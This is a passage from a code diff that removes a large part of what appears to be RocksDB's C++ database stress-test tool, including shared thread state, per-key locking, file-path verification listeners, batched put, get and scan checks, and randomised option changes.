-    fprintf(stdout, "%-12s: Deleted %ld times\n", "", deletes_);
-    fprintf(stdout, "%-12s: Single deleted %" ROCKSDB_PRIszt " times\n", "",
-           single_deletes_);
-    fprintf(stdout, "%-12s: %ld read and %ld found the key\n", "",
-            gets_, founds_);
-    fprintf(stdout, "%-12s: Prefix scanned %ld times\n", "", prefixes_);
-    fprintf(stdout, "%-12s: Iterator size sum is %ld\n", "",
-            iterator_size_sums_);
-    fprintf(stdout, "%-12s: Iterated %ld times\n", "", iterations_);
-    fprintf(stdout, "%-12s: Deleted %ld key-ranges\n", "", range_deletions_);
-    fprintf(stdout, "%-12s: Range deletions covered %ld keys\n", "",
-            covered_by_range_deletions_);
-
-    fprintf(stdout, "%-12s: Got errors %ld times\n", "", errors_);
-    fprintf(stdout, "%-12s: %ld CompactFiles() succeed\n", "",
-            num_compact_files_succeed_);
-    fprintf(stdout, "%-12s: %ld CompactFiles() did not succeed\n", "",
-            num_compact_files_failed_);
-
-    if (FLAGS_histogram) {
-      fprintf(stdout, "Microseconds per op:\n%s\n", hist_.ToString().c_str());
-    }
-    fflush(stdout);
-  }
-};
-
-// State shared by all concurrent executions of the same benchmark.
-class SharedState {
- public:
-  static const uint32_t SENTINEL;
-
-  explicit SharedState(StressTest* stress_test)
-      : cv_(&mu_),
-        seed_(static_cast<uint32_t>(FLAGS_seed)),
-        max_key_(FLAGS_max_key),
-        log2_keys_per_lock_(static_cast<uint32_t>(FLAGS_log2_keys_per_lock)),
-        num_threads_(FLAGS_threads),
-        num_initialized_(0),
-        num_populated_(0),
-        vote_reopen_(0),
-        num_done_(0),
-        start_(false),
-        start_verify_(false),
-        should_stop_bg_thread_(false),
-        bg_thread_finished_(false),
-        stress_test_(stress_test),
-        verification_failure_(false),
-        no_overwrite_ids_(FLAGS_column_families) {
-    // Pick random keys in each column family that will not experience
-    // overwrite
-
-    printf("Choosing random keys with no overwrite\n");
-    Random rnd(seed_);
-    size_t num_no_overwrite_keys = (max_key_ * FLAGS_nooverwritepercent) / 100;
-    for (auto& cf_ids : no_overwrite_ids_) {
-      for (size_t i = 0; i < num_no_overwrite_keys; i++) {
-        size_t rand_key;
-        do {
-          rand_key = rnd.Next() % max_key_;
-        } while (cf_ids.find(rand_key) != cf_ids.end());
-        cf_ids.insert(rand_key);
-      }
-      assert(cf_ids.size() == num_no_overwrite_keys);
-    }
-
-    if (FLAGS_test_batches_snapshots) {
-      fprintf(stdout, "No lock creation because test_batches_snapshots set\n");
-      return;
-    }
-    values_.resize(FLAGS_column_families);
-
-    for (int i = 0; i < FLAGS_column_families; ++i) {
-      values_[i] = std::vector<uint32_t>(max_key_, SENTINEL);
-    }
-
-    long num_locks = static_cast<long>(max_key_ >> log2_keys_per_lock_);
-    if (max_key_ & ((1 << log2_keys_per_lock_) - 1)) {
-      num_locks++;
-    }
-    fprintf(stdout, "Creating %ld locks\n", num_locks * FLAGS_column_families);
-    key_locks_.resize(FLAGS_column_families);
-
-    for (int i = 0; i < FLAGS_column_families; ++i) {
-      key_locks_[i].resize(num_locks);
-      for (auto& ptr : key_locks_[i]) {
-        ptr.reset(new port::Mutex);
-      }
-    }
-  }
-
-  ~SharedState() {}
-
-  port::Mutex* GetMutex() {
-    return &mu_;
-  }
-
-  port::CondVar* GetCondVar() {
-    return &cv_;
-  }
-
-  StressTest* GetStressTest() const {
-    return stress_test_;
-  }
-
-  int64_t GetMaxKey() const {
-    return max_key_;
-  }
-
-  uint32_t GetNumThreads() const {
-    return num_threads_;
-  }
-
-  void IncInitialized() {
-    num_initialized_++;
-  }
-
-  void IncOperated() {
-    num_populated_++;
-  }
-
-  void IncDone() {
-    num_done_++;
-  }
-
-  void IncVotedReopen() {
-    vote_reopen_ = (vote_reopen_ + 1) % num_threads_;
-  }
-
-  bool AllInitialized() const {
-    return num_initialized_ >= num_threads_;
-  }
-
-  bool AllOperated() const {
-    return num_populated_ >= num_threads_;
-  }
-
-  bool AllDone() const {
-    return num_done_ >= num_threads_;
-  }
-
-  bool AllVotedReopen() {
-    return (vote_reopen_ == 0);
-  }
-
-  void SetStart() {
-    start_ = true;
-  }
-
-  void SetStartVerify() {
-    start_verify_ = true;
-  }
-
-  bool Started() const {
-    return start_;
-  }
-
-  bool VerifyStarted() const {
-    return start_verify_;
-  }
-
-  void SetVerificationFailure() { verification_failure_.store(true); }
-
-  bool HasVerificationFailedYet() { return verification_failure_.load(); }
-
-  port::Mutex* GetMutexForKey(int cf, long key) {
-    return key_locks_[cf][key >> log2_keys_per_lock_].get();
-  }
-
-  void LockColumnFamily(int cf) {
-    for (auto& mutex : key_locks_[cf]) {
-      mutex->Lock();
-    }
-  }
-
-  void UnlockColumnFamily(int cf) {
-    for (auto& mutex : key_locks_[cf]) {
-      mutex->Unlock();
-    }
-  }
-
-  void ClearColumnFamily(int cf) {
-    std::fill(values_[cf].begin(), values_[cf].end(), SENTINEL);
-  }
-
-  void Put(int cf, int64_t key, uint32_t value_base) {
-    values_[cf][key] = value_base;
-  }
-
-  uint32_t Get(int cf, int64_t key) const { return values_[cf][key]; }
-
-  void Delete(int cf, int64_t key) { values_[cf][key] = SENTINEL; }
-
-  void SingleDelete(int cf, int64_t key) { values_[cf][key] = SENTINEL; }
-
-  int DeleteRange(int cf, int64_t begin_key, int64_t end_key) {
-    int covered = 0;
-    for (int64_t key = begin_key; key < end_key; ++key) {
-      if (values_[cf][key] != SENTINEL) {
-        ++covered;
-      }
-      values_[cf][key] = SENTINEL;
-    }
-    return covered;
-  }
-
-  bool AllowsOverwrite(int cf, int64_t key) {
-    return no_overwrite_ids_[cf].find(key) == no_overwrite_ids_[cf].end();
-  }
-
-  bool Exists(int cf, int64_t key) { return values_[cf][key] != SENTINEL; }
-
-  uint32_t GetSeed() const { return seed_; }
-
-  void SetShouldStopBgThread() { should_stop_bg_thread_ = true; }
-
-  bool ShoudStopBgThread() { return should_stop_bg_thread_; }
-
-  void SetBgThreadFinish() { bg_thread_finished_ = true; }
-
-  bool BgThreadFinished() const { return bg_thread_finished_; }
-
- private:
-  port::Mutex mu_;
-  port::CondVar cv_;
-  const uint32_t seed_;
-  const int64_t max_key_;
-  const uint32_t log2_keys_per_lock_;
-  const int num_threads_;
-  long num_initialized_;
-  long num_populated_;
-  long vote_reopen_;
-  long num_done_;
-  bool start_;
-  bool start_verify_;
-  bool should_stop_bg_thread_;
-  bool bg_thread_finished_;
-  StressTest* stress_test_;
-  std::atomic<bool> verification_failure_;
-
-  // Keys that should not be overwritten
-  std::vector<std::set<size_t> > no_overwrite_ids_;
-
-  std::vector<std::vector<uint32_t>> values_;
-  // Has to make it owned by a smart ptr as port::Mutex is not copyable
-  // and storing it in the container may require copying depending on the impl.
-  std::vector<std::vector<std::unique_ptr<port::Mutex> > > key_locks_;
-};
-
-const uint32_t SharedState::SENTINEL = 0xffffffff;
-
-// Per-thread state for concurrent executions of the same benchmark.
-struct ThreadState {
-  uint32_t tid; // 0..n-1
-  Random rand;  // Has different seeds for different threads
-  SharedState* shared;
-  Stats stats;
-
-  ThreadState(uint32_t index, SharedState* _shared)
-      : tid(index), rand(1000 + index + _shared->GetSeed()), shared(_shared) {}
-};
-
-class DbStressListener : public EventListener {
- public:
-  DbStressListener(const std::string& db_name,
-                   const std::vector<DbPath>& db_paths)
-      : db_name_(db_name), db_paths_(db_paths) {}
-  virtual ~DbStressListener() {}
-#ifndef ROCKSDB_LITE
-  virtual void OnFlushCompleted(DB* db, const FlushJobInfo& info) override {
-    assert(db);
-    assert(db->GetName() == db_name_);
-    assert(IsValidColumnFamilyName(info.cf_name));
-    VerifyFilePath(info.file_path);
-    // pretending doing some work here
-    std::this_thread::sleep_for(
-        std::chrono::microseconds(Random::GetTLSInstance()->Uniform(5000)));
-  }
-
-  virtual void OnCompactionCompleted(DB* db,
-                                     const CompactionJobInfo& ci) override {
-    assert(db);
-    assert(db->GetName() == db_name_);
-    assert(IsValidColumnFamilyName(ci.cf_name));
-    assert(ci.input_files.size() + ci.output_files.size() > 0U);
-    for (const auto& file_path : ci.input_files) {
-      VerifyFilePath(file_path);
-    }
-    for (const auto& file_path : ci.output_files) {
-      VerifyFilePath(file_path);
-    }
-    // pretending doing some work here
-    std::this_thread::sleep_for(
-        std::chrono::microseconds(Random::GetTLSInstance()->Uniform(5000)));
-  }
-
-  virtual void OnTableFileCreated(const TableFileCreationInfo& info) override {
-    assert(info.db_name == db_name_);
-    assert(IsValidColumnFamilyName(info.cf_name));
-    VerifyFilePath(info.file_path);
-    assert(info.job_id > 0 || FLAGS_compact_files_one_in > 0);
-    if (info.status.ok()) {
-      assert(info.file_size > 0);
-      assert(info.table_properties.data_size > 0);
-      assert(info.table_properties.raw_key_size > 0);
-      assert(info.table_properties.num_entries > 0);
-    }
-  }
-
- protected:
-  bool IsValidColumnFamilyName(const std::string& cf_name) const {
-    if (cf_name == kDefaultColumnFamilyName) {
-      return true;
-    }
-    // The column family names in the stress tests are numbers.
-    for (size_t i = 0; i < cf_name.size(); ++i) {
-      if (cf_name[i] < '0' || cf_name[i] > '9') {
-        return false;
-      }
-    }
-    return true;
-  }
-
-  void VerifyFileDir(const std::string& file_dir) {
-#ifndef NDEBUG
-    if (db_name_ == file_dir) {
-      return;
-    }
-    for (const auto& db_path : db_paths_) {
-      if (db_path.path == file_dir) {
-        return;
-      }
-    }
-    assert(false);
-#endif  // !NDEBUG
-  }
-
-  void VerifyFileName(const std::string& file_name) {
-#ifndef NDEBUG
-    uint64_t file_number;
-    FileType file_type;
-    bool result = ParseFileName(file_name, &file_number, &file_type);
-    assert(result);
-    assert(file_type == kTableFile);
-#endif  // !NDEBUG
-  }
-
-  void VerifyFilePath(const std::string& file_path) {
-#ifndef NDEBUG
-    size_t pos = file_path.find_last_of("/");
-    if (pos == std::string::npos) {
-      VerifyFileName(file_path);
-    } else {
-      if (pos > 0) {
-        VerifyFileDir(file_path.substr(0, pos));
-      }
-      VerifyFileName(file_path.substr(pos));
-    }
-#endif  // !NDEBUG
-  }
-#endif  // !ROCKSDB_LITE
-
- private:
-  std::string db_name_;
-  std::vector<DbPath> db_paths_;
-};
-
-}  // namespace
-
-class StressTest {
- public:
-  StressTest()
-      : cache_(NewCache(FLAGS_cache_size)),
-        compressed_cache_(NewLRUCache(FLAGS_compressed_cache_size)),
-        filter_policy_(FLAGS_bloom_bits >= 0
-                           ? FLAGS_use_block_based_filter
-                                 ? NewBloomFilterPolicy(FLAGS_bloom_bits, true)
-                                 : NewBloomFilterPolicy(FLAGS_bloom_bits, false)
-                           : nullptr),
-        db_(nullptr),
-        new_column_family_name_(1),
-        num_times_reopened_(0) {
-    if (FLAGS_destroy_db_initially) {
-      std::vector<std::string> files;
-      FLAGS_env->GetChildren(FLAGS_db, &files);
-      for (unsigned int i = 0; i < files.size(); i++) {
-        if (Slice(files[i]).starts_with("heap-")) {
-          FLAGS_env->DeleteFile(FLAGS_db + "/" + files[i]);
-        }
-      }
-      DestroyDB(FLAGS_db, Options());
-    }
-  }
-
-  ~StressTest() {
-    for (auto cf : column_families_) {
-      delete cf;
-    }
-    column_families_.clear();
-    delete db_;
-  }
-
-  std::shared_ptr<Cache> NewCache(size_t capacity) {
-    if (capacity <= 0) {
-      return nullptr;
-    }
-    if (FLAGS_use_clock_cache) {
-      auto cache = NewClockCache((size_t)capacity);
-      if (!cache) {
-        fprintf(stderr, "Clock cache not supported.");
-        exit(1);
-      }
-      return cache;
-    } else {
-      return NewLRUCache((size_t)capacity);
-    }
-  }
-
-  bool BuildOptionsTable() {
-    if (FLAGS_set_options_one_in <= 0) {
-      return true;
-    }
-
-    std::unordered_map<std::string, std::vector<std::string> > options_tbl = {
-        {"write_buffer_size",
-         {ToString(FLAGS_write_buffer_size),
-          ToString(FLAGS_write_buffer_size * 2),
-          ToString(FLAGS_write_buffer_size * 4)}},
-        {"max_write_buffer_number",
-         {ToString(FLAGS_max_write_buffer_number),
-          ToString(FLAGS_max_write_buffer_number * 2),
-          ToString(FLAGS_max_write_buffer_number * 4)}},
-        {"arena_block_size",
-         {
-             ToString(Options().arena_block_size),
-             ToString(FLAGS_write_buffer_size / 4),
-             ToString(FLAGS_write_buffer_size / 8),
-         }},
-        {"memtable_huge_page_size", {"0", ToString(2 * 1024 * 1024)}},
-        {"max_successive_merges", {"0", "2", "4"}},
-        {"inplace_update_num_locks", {"100", "200", "300"}},
-        // TODO(ljin): enable test for this option
-        // {"disable_auto_compactions", {"100", "200", "300"}},
-        {"soft_rate_limit", {"0", "0.5", "0.9"}},
-        {"hard_rate_limit", {"0", "1.1", "2.0"}},
-        {"level0_file_num_compaction_trigger",
-         {
-             ToString(FLAGS_level0_file_num_compaction_trigger),
-             ToString(FLAGS_level0_file_num_compaction_trigger + 2),
-             ToString(FLAGS_level0_file_num_compaction_trigger + 4),
-         }},
-        {"level0_slowdown_writes_trigger",
-         {
-             ToString(FLAGS_level0_slowdown_writes_trigger),
-             ToString(FLAGS_level0_slowdown_writes_trigger + 2),
-             ToString(FLAGS_level0_slowdown_writes_trigger + 4),
-         }},
-        {"level0_stop_writes_trigger",
-         {
-             ToString(FLAGS_level0_stop_writes_trigger),
-             ToString(FLAGS_level0_stop_writes_trigger + 2),
-             ToString(FLAGS_level0_stop_writes_trigger + 4),
-         }},
-        {"max_compaction_bytes",
-         {
-             ToString(FLAGS_target_file_size_base * 5),
-             ToString(FLAGS_target_file_size_base * 15),
-             ToString(FLAGS_target_file_size_base * 100),
-         }},
-        {"target_file_size_base",
-         {
-             ToString(FLAGS_target_file_size_base),
-             ToString(FLAGS_target_file_size_base * 2),
-             ToString(FLAGS_target_file_size_base * 4),
-         }},
-        {"target_file_size_multiplier",
-         {
-             ToString(FLAGS_target_file_size_multiplier), "1", "2",
-         }},
-        {"max_bytes_for_level_base",
-         {
-             ToString(FLAGS_max_bytes_for_level_base / 2),
-             ToString(FLAGS_max_bytes_for_level_base),
-             ToString(FLAGS_max_bytes_for_level_base * 2),
-         }},
-        {"max_bytes_for_level_multiplier",
-         {
-             ToString(FLAGS_max_bytes_for_level_multiplier), "1", "2",
-         }},
-        {"max_sequential_skip_in_iterations", {"4", "8", "12"}},
-        {"use_direct_reads", {"false", "true"}},
-        {"use_direct_io_for_flush_and_compaction", {"false", "true"}},
-    };
-
-    options_table_ = std::move(options_tbl);
-
-    for (const auto& iter : options_table_) {
-      options_index_.push_back(iter.first);
-    }
-    return true;
-  }
-
-  bool Run() {
-    PrintEnv();
-    BuildOptionsTable();
-    Open();
-    SharedState shared(this);
-    uint32_t n = shared.GetNumThreads();
-
-    std::vector<ThreadState*> threads(n);
-    for (uint32_t i = 0; i < n; i++) {
-      threads[i] = new ThreadState(i, &shared);
-      FLAGS_env->StartThread(ThreadBody, threads[i]);
-    }
-    ThreadState bg_thread(0, &shared);
-    if (FLAGS_compaction_thread_pool_adjust_interval > 0) {
-      FLAGS_env->StartThread(PoolSizeChangeThread, &bg_thread);
-    }
-
-    // Each thread goes through the following states:
-    // initializing -> wait for others to init -> read/populate/depopulate
-    // wait for others to operate -> verify -> done
-
-    {
-      MutexLock l(shared.GetMutex());
-      while (!shared.AllInitialized()) {
-        shared.GetCondVar()->Wait();
-      }
-
-      auto now = FLAGS_env->NowMicros();
-      fprintf(stdout, "%s Starting database operations\n",
-              FLAGS_env->TimeToString(now/1000000).c_str());
-
-      shared.SetStart();
-      shared.GetCondVar()->SignalAll();
-      while (!shared.AllOperated()) {
-        shared.GetCondVar()->Wait();
-      }
-
-      now = FLAGS_env->NowMicros();
-      if (FLAGS_test_batches_snapshots) {
-        fprintf(stdout, "%s Limited verification already done during gets\n",
-                FLAGS_env->TimeToString((uint64_t) now/1000000).c_str());
-      } else {
-        fprintf(stdout, "%s Starting verification\n",
-                FLAGS_env->TimeToString((uint64_t) now/1000000).c_str());
-      }
-
-      shared.SetStartVerify();
-      shared.GetCondVar()->SignalAll();
-      while (!shared.AllDone()) {
-        shared.GetCondVar()->Wait();
-      }
-    }
-
-    for (unsigned int i = 1; i < n; i++) {
-      threads[0]->stats.Merge(threads[i]->stats);
-    }
-    threads[0]->stats.Report("Stress Test");
-
-    for (unsigned int i = 0; i < n; i++) {
-      delete threads[i];
-      threads[i] = nullptr;
-    }
-    auto now = FLAGS_env->NowMicros();
-    if (!FLAGS_test_batches_snapshots && !shared.HasVerificationFailedYet()) {
-      fprintf(stdout, "%s Verification successful\n",
-              FLAGS_env->TimeToString(now/1000000).c_str());
-    }
-    PrintStatistics();
-
-    if (FLAGS_compaction_thread_pool_adjust_interval > 0) {
-      MutexLock l(shared.GetMutex());
-      shared.SetShouldStopBgThread();
-      while (!shared.BgThreadFinished()) {
-        shared.GetCondVar()->Wait();
-      }
-    }
-
-    if (shared.HasVerificationFailedYet()) {
-      printf("Verification failed :(\n");
-      return false;
-    }
-    return true;
-  }
-
- private:
-
-  static void ThreadBody(void* v) {
-    ThreadState* thread = reinterpret_cast<ThreadState*>(v);
-    SharedState* shared = thread->shared;
-
-    {
-      MutexLock l(shared->GetMutex());
-      shared->IncInitialized();
-      if (shared->AllInitialized()) {
-        shared->GetCondVar()->SignalAll();
-      }
-      while (!shared->Started()) {
-        shared->GetCondVar()->Wait();
-      }
-    }
-    thread->shared->GetStressTest()->OperateDb(thread);
-
-    {
-      MutexLock l(shared->GetMutex());
-      shared->IncOperated();
-      if (shared->AllOperated()) {
-        shared->GetCondVar()->SignalAll();
-      }
-      while (!shared->VerifyStarted()) {
-        shared->GetCondVar()->Wait();
-      }
-    }
-
-    if (!FLAGS_test_batches_snapshots) {
-      thread->shared->GetStressTest()->VerifyDb(thread);
-    }
-
-    {
-      MutexLock l(shared->GetMutex());
-      shared->IncDone();
-      if (shared->AllDone()) {
-        shared->GetCondVar()->SignalAll();
-      }
-    }
-
-  }
-
-  static void PoolSizeChangeThread(void* v) {
-    assert(FLAGS_compaction_thread_pool_adjust_interval > 0);
-    ThreadState* thread = reinterpret_cast<ThreadState*>(v);
-    SharedState* shared = thread->shared;
-
-    while (true) {
-      {
-        MutexLock l(shared->GetMutex());
-        if (shared->ShoudStopBgThread()) {
-          shared->SetBgThreadFinish();
-          shared->GetCondVar()->SignalAll();
-          return;
-        }
-      }
-
-      auto thread_pool_size_base = FLAGS_max_background_compactions;
-      auto thread_pool_size_var = FLAGS_compaction_thread_pool_variations;
-      int new_thread_pool_size =
-          thread_pool_size_base - thread_pool_size_var +
-          thread->rand.Next() % (thread_pool_size_var * 2 + 1);
-      if (new_thread_pool_size < 1) {
-        new_thread_pool_size = 1;
-      }
-      FLAGS_env->SetBackgroundThreads(new_thread_pool_size);
-      // Sleep up to 3 seconds
-      FLAGS_env->SleepForMicroseconds(
-          thread->rand.Next() % FLAGS_compaction_thread_pool_adjust_interval *
-              1000 +
-          1);
-    }
-  }
-
-  // Given a key K and value V, this puts ("0"+K, "0"+V), ("1"+K, "1"+V), ...
-  // ("9"+K, "9"+V) in DB atomically i.e in a single batch.
-  // Also refer MultiGet.
-  Status MultiPut(ThreadState* thread, const WriteOptions& writeoptions,
-                  ColumnFamilyHandle* column_family, const Slice& key,
-                  const Slice& value, size_t sz) {
-    std::string keys[10] = {"9", "8", "7", "6", "5",
-                            "4", "3", "2", "1", "0"};
-    std::string values[10] = {"9", "8", "7", "6", "5",
-                              "4", "3", "2", "1", "0"};
-    Slice value_slices[10];
-    WriteBatch batch;
-    Status s;
-    for (int i = 0; i < 10; i++) {
-      keys[i] += key.ToString();
-      values[i] += value.ToString();
-      value_slices[i] = values[i];
-      if (FLAGS_use_merge) {
-        batch.Merge(column_family, keys[i], value_slices[i]);
-      } else {
-        batch.Put(column_family, keys[i], value_slices[i]);
-      }
-    }
-
-    s = db_->Write(writeoptions, &batch);
-    if (!s.ok()) {
-      fprintf(stderr, "multiput error: %s\n", s.ToString().c_str());
-      thread->stats.AddErrors(1);
-    } else {
-      // we did 10 writes each of size sz + 1
-      thread->stats.AddBytesForWrites(10, (sz + 1) * 10);
-    }
-
-    return s;
-  }
-
-  // Given a key K, this deletes ("0"+K), ("1"+K),... ("9"+K)
-  // in DB atomically i.e in a single batch. Also refer MultiGet.
-  Status MultiDelete(ThreadState* thread, const WriteOptions& writeoptions,
-                     ColumnFamilyHandle* column_family, const Slice& key) {
-    std::string keys[10] = {"9", "7", "5", "3", "1",
-                            "8", "6", "4", "2", "0"};
-
-    WriteBatch batch;
-    Status s;
-    for (int i = 0; i < 10; i++) {
-      keys[i] += key.ToString();
-      batch.Delete(column_family, keys[i]);
-    }
-
-    s = db_->Write(writeoptions, &batch);
-    if (!s.ok()) {
-      fprintf(stderr, "multidelete error: %s\n", s.ToString().c_str());
-      thread->stats.AddErrors(1);
-    } else {
-      thread->stats.AddDeletes(10);
-    }
-
-    return s;
-  }
-
-  // Given a key K, this gets values for "0"+K, "1"+K,..."9"+K
-  // in the same snapshot, and verifies that all the values are of the form
-  // "0"+V, "1"+V,..."9"+V.
-  // ASSUMES that MultiPut was used to put (K, V) into the DB.
-  Status MultiGet(ThreadState* thread, const ReadOptions& readoptions,
-                  ColumnFamilyHandle* column_family, const Slice& key,
-                  std::string* value) {
-    std::string keys[10] = {"0", "1", "2", "3", "4", "5", "6", "7", "8", "9"};
-    Slice key_slices[10];
-    std::string values[10];
-    ReadOptions readoptionscopy = readoptions;
-    readoptionscopy.snapshot = db_->GetSnapshot();
-    Status s;
-    for (int i = 0; i < 10; i++) {
-      keys[i] += key.ToString();
-      key_slices[i] = keys[i];
-      s = db_->Get(readoptionscopy, column_family, key_slices[i], value);
-      if (!s.ok() && !s.IsNotFound()) {
-        fprintf(stderr, "get error: %s\n", s.ToString().c_str());
-        values[i] = "";
-        thread->stats.AddErrors(1);
-        // we continue after error rather than exiting so that we can
-        // find more errors if any
-      } else if (s.IsNotFound()) {
-        values[i] = "";
-        thread->stats.AddGets(1, 0);
-      } else {
-        values[i] = *value;
-
-        char expected_prefix = (keys[i])[0];
-        char actual_prefix = (values[i])[0];
-        if (actual_prefix != expected_prefix) {
-          fprintf(stderr, "error expected prefix = %c actual = %c\n",
-                  expected_prefix, actual_prefix);
-        }
-        (values[i])[0] = ' '; // blank out the differing character
-        thread->stats.AddGets(1, 1);
-      }
-    }
-    db_->ReleaseSnapshot(readoptionscopy.snapshot);
-
-    // Now that we retrieved all values, check that they all match
-    for (int i = 1; i < 10; i++) {
-      if (values[i] != values[0]) {
-        fprintf(stderr, "error : inconsistent values for key %s: %s, %s\n",
-                key.ToString(true).c_str(), StringToHex(values[0]).c_str(),
-                StringToHex(values[i]).c_str());
-      // we continue after error rather than exiting so that we can
-      // find more errors if any
-      }
-    }
-
-    return s;
-  }
-
-  // Given a key, this does prefix scans for "0"+P, "1"+P,..."9"+P
-  // in the same snapshot where P is the first FLAGS_prefix_size - 1 bytes
-  // of the key. Each of these 10 scans returns a series of values;
-  // each series should be the same length, and it is verified for each
-  // index i that all the i'th values are of the form "0"+V, "1"+V,..."9"+V.
-  // ASSUMES that MultiPut was used to put (K, V)
-  Status MultiPrefixScan(ThreadState* thread, const ReadOptions& readoptions,
-                         ColumnFamilyHandle* column_family,
-                         const Slice& key) {
-    std::string prefixes[10] = {"0", "1", "2", "3", "4",
-                                "5", "6", "7", "8", "9"};
-    Slice prefix_slices[10];
-    ReadOptions readoptionscopy[10];
-    const Snapshot* snapshot = db_->GetSnapshot();
-    Iterator* iters[10];
-    Status s = Status::OK();
-    for (int i = 0; i < 10; i++) {
-      prefixes[i] += key.ToString();
-      prefixes[i].resize(FLAGS_prefix_size);
-      prefix_slices[i] = Slice(prefixes[i]);
-      readoptionscopy[i] = readoptions;
-      readoptionscopy[i].snapshot = snapshot;
-      iters[i] = db_->NewIterator(readoptionscopy[i], column_family);
-      iters[i]->Seek(prefix_slices[i]);
-    }
-
-    int count = 0;
-    while (iters[0]->Valid() && iters[0]->key().starts_with(prefix_slices[0])) {
-      count++;
-      std::string values[10];
-      // get list of all values for this iteration
-      for (int i = 0; i < 10; i++) {
-        // no iterator should finish before the first one
-        assert(iters[i]->Valid() &&
-               iters[i]->key().starts_with(prefix_slices[i]));
-        values[i] = iters[i]->value().ToString();
-
-        char expected_first = (prefixes[i])[0];
-        char actual_first = (values[i])[0];
-
-        if (actual_first != expected_first) {
-          fprintf(stderr, "error expected first = %c actual = %c\n",
-                  expected_first, actual_first);
-        }
-        (values[i])[0] = ' '; // blank out the differing character
-      }
-      // make sure all values are equivalent
-      for (int i = 0; i < 10; i++) {
-        if (values[i] != values[0]) {
-          fprintf(stderr, "error : %d, inconsistent values for prefix %s: %s, %s\n",
-                  i, prefixes[i].c_str(), StringToHex(values[0]).c_str(),
-                  StringToHex(values[i]).c_str());
-          // we continue after error rather than exiting so that we can
-          // find more errors if any
-        }
-        iters[i]->Next();
-      }
-    }
-
-    // cleanup iterators and snapshot
-    for (int i = 0; i < 10; i++) {
-      // if the first iterator finished, they should have all finished
-      assert(!iters[i]->Valid() ||
-             !iters[i]->key().starts_with(prefix_slices[i]));
-      assert(iters[i]->status().ok());
-      delete iters[i];
-    }
-    db_->ReleaseSnapshot(snapshot);
-
-    if (s.ok()) {
-      thread->stats.AddPrefixes(1, count);
-    } else {
-      thread->stats.AddErrors(1);
-    }
-
-    return s;
-  }
-
-  // Given a key K, this creates an iterator which scans to K and then
-  // does a random sequence of Next/Prev operations.
-  Status MultiIterate(ThreadState* thread, const ReadOptions& readoptions,
-                      ColumnFamilyHandle* column_family, const Slice& key) {
-    Status s;
-    const Snapshot* snapshot = db_->GetSnapshot();
-    ReadOptions readoptionscopy = readoptions;
-    readoptionscopy.snapshot = snapshot;
-    unique_ptr<Iterator> iter(db_->NewIterator(readoptionscopy, column_family));
-
-    iter->Seek(key);
-    for (uint64_t i = 0; i < FLAGS_num_iterations && iter->Valid(); i++) {
-      if (thread->rand.OneIn(2)) {
-        iter->Next();
-      } else {
-        iter->Prev();
-      }
-    }
-
-    if (s.ok()) {
-      thread->stats.AddIterations(1);
-    } else {
-      thread->stats.AddErrors(1);
-    }
-
-    db_->ReleaseSnapshot(snapshot);
-
-    return s;
-  }
-
-  Status SetOptions(ThreadState* thread) {
-    assert(FLAGS_set_options_one_in > 0);
-    std::unordered_map<std::string, std::string> opts;
-    std::string name = options_index_[
-      thread->rand.Next() % options_index_.size()];
-    int value_idx = thread->rand.Next() % options_table_[name].size();
-    if (name == "soft_rate_limit" || name == "hard_rate_limit") {
-      opts["soft_rate_limit"] = options_table_["soft_rate_limit"][value_idx];
-      opts["hard_rate_limit"] = options_table_["hard_rate_limit"][value_idx];
-    } else if (name == "level0_file_num_compaction_trigger" ||
-               name == "level0_slowdown_writes_trigger" ||
-               name == "level0_stop_writes_trigger") {
-      opts["level0_file_num_compaction_trigger"] =
-        options_table_["level0_file_num_compaction_trigger"][value_idx];
-      opts["level0_slowdown_writes_trigger"] =
-        options_table_["level0_slowdown_writes_trigger"][value_idx];
-      opts["level0_stop_writes_trigger"] =
-        options_table_["level0_stop_writes_trigger"][value_idx];
-    } else {
-      opts[name] = options_table_[name][value_idx];
-    }
-
-    int rand_cf_idx = thread->rand.Next() % FLAGS_column_families;
-    auto cfh = column_families_[rand_cf_idx];
-    return db_->SetOptions(cfh, opts);
-  }
-
-  void OperateDb(ThreadState* thread) {
-    ReadOptions read_opts(FLAGS_verify_checksum, true);
-    WriteOptions write_opts;
-    auto shared = thread->shared;
-    char value[100];
-    auto max_key = thread->shared->GetMaxKey();
-    std::string from_db;
-    if (FLAGS_sync) {
-      write_opts.sync = true;
-    }
-    write_opts.disableWAL = FLAGS_disable_wal;
-    const int prefixBound = (int)FLAGS_readpercent + (int)FLAGS_prefixpercent;
-    const int writeBound = prefixBound + (int)FLAGS_writepercent;
-    const int delBound = writeBound + (int)FLAGS_delpercent;
-    const int delRangeBound = delBound + (int)FLAGS_delrangepercent;
-
-    thread->stats.Start();
-    for (uint64_t i = 0; i < FLAGS_ops_per_thread; i++) {
-      if (thread->shared->HasVerificationFailedYet()) {
-        break;
-      }
-      if (i != 0 && (i % (FLAGS_ops_per_thread / (FLAGS_reopen + 1))) == 0) {
-        {
-          thread->stats.FinishedSingleOp();
-          MutexLock l(thread->shared->GetMutex());
-          thread->shared->IncVotedReopen();
-          if (thread->shared->AllVotedReopen()) {
-            thread->shared->GetStressTest()->Reopen();
-            thread->shared->GetCondVar()->SignalAll();
-          }
-          else {
-            thread->shared->GetCondVar()->Wait();
-          }
-          // Commenting this out as we don't want to reset stats on each open.
-          // thread->stats.Start();
-        }
-      }
-
-      // Change Options
-      if (FLAGS_set_options_one_in > 0 &&
-          thread->rand.OneIn(FLAGS_set_options_one_in)) {
-        SetOptions(thread);
-      }
-
-      if (FLAGS_set_in_place_one_in > 0 &&
-          thread->rand.OneIn(FLAGS_set_in_place_one_in)) {
-        options_.inplace_update_support ^= options_.inplace_update_support;
-      }
-
-      if (!FLAGS_test_batches_snapshots &&
-          FLAGS_clear_column_family_one_in != 0 && FLAGS_column_families > 1) {
-        if (thread->rand.OneIn(FLAGS_clear_column_family_one_in)) {
-          // drop column family and then create it again (can't drop default)
-          int cf = thread->rand.Next() % (FLAGS_column_families - 1) + 1;
-          std::string new_name =
-              ToString(new_column_family_name_.fetch_add(1));
-          {
-            MutexLock l(thread->shared->GetMutex());
-            fprintf(
-                stdout,
-                "[CF %d] Dropping and recreating column family. new name: %s\n",
-                cf, new_name.c_str());
-          }
-          thread->shared->LockColumnFamily(cf);
-          Status s __attribute__((unused));
-          s = db_->DropColumnFamily(column_families_[cf]);
-          delete column_families_[cf];
-          if (!s.ok()) {
-            fprintf(stderr, "dropping column family error: %s\n",
-                s.ToString().c_str());
-            std::terminate();
-          }
-          s = db_->CreateColumnFamily(ColumnFamilyOptions(options_), new_name,
-                                      &column_families_[cf]);
